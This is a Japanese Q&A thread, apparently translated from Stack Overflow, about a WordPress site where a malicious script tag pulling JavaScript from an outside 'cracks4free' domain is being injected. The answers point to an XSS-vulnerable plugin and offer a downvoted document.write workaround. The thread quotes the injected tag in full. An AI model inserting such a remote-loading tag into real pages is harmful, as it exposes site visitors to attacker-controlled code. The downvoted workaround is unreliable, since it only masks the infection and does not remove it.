0

Wordpress サイトを使用していますが、マルウェア スクリプトを見つけました。ページを保存して WYSIWYG でテキスト パネルをクリックしようとすると、マルウェア JavaScript タグがページに自動的に追加されます。これが自動的に追加されるスクリプトです。

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>

次のコードで src ファイルを削除しようとしました。しかし、うまくいきませんでした。スクリプトは body タグを閉じる前に最後に実行されます。このスクリプトを使用してみましたが、javascript がすべて読み込まれた後にマルウェア スクリプトが読み込まれます。これが私のコードです。

<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script>

このコードを削除するか、javasript、jquery、ajax を介してこのコードが実行されないようにする必要があります。これを削除したいだけです。ありがとう

4

3 に答える 3

1

Wordpress プラグインの 1 つがXSS(クロスサイト スクリプティング) に対して脆弱なようです。このプラグインの脆弱性について Web をスキャンすることをお勧めします。プラグインのソース コードを自分でスキャンして、適切にエスケープせずに盲目的に JavaScript をユーザーに送り返すことができます。

ハミッシュのアドバイスに従う必要があります。問題のあるプラグインを再インストールしないように、私の提案はここに含まれています。

于 2013-08-01T00:03:37.997 に答える
-4

マルウェア スクリプトが JavaScript を介して実行される直前に、新しいスクリプト タグの先頭を挿入できます。

document.write("<script type='application/x-suppress'>");

基本的に、ここでは新しい<script>ブロックを開始していますが、それを終了していません。次に発生するのは、マルウェアがそのブロックを最後に挿入することであると想定しています

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>

最終結果は

<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>

何が起こるかというと、ブラウザーは最初の<script>タグを見て、その中のすべてが JavaScript コードであることを期待します。スクリプト ( ) を解析しようとする<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">と、JavaScript 解析エラーが発生し、何も実行されません。最後に、マルウェアが提供する<script>を介してブロックが閉じられます。</script>

問題は、なぜこのマルウェアを持っているのか、どうすれば駆除できるのかということです。それを回避しようとするのではなく。

于 2013-08-01T00:02:57.133 に答える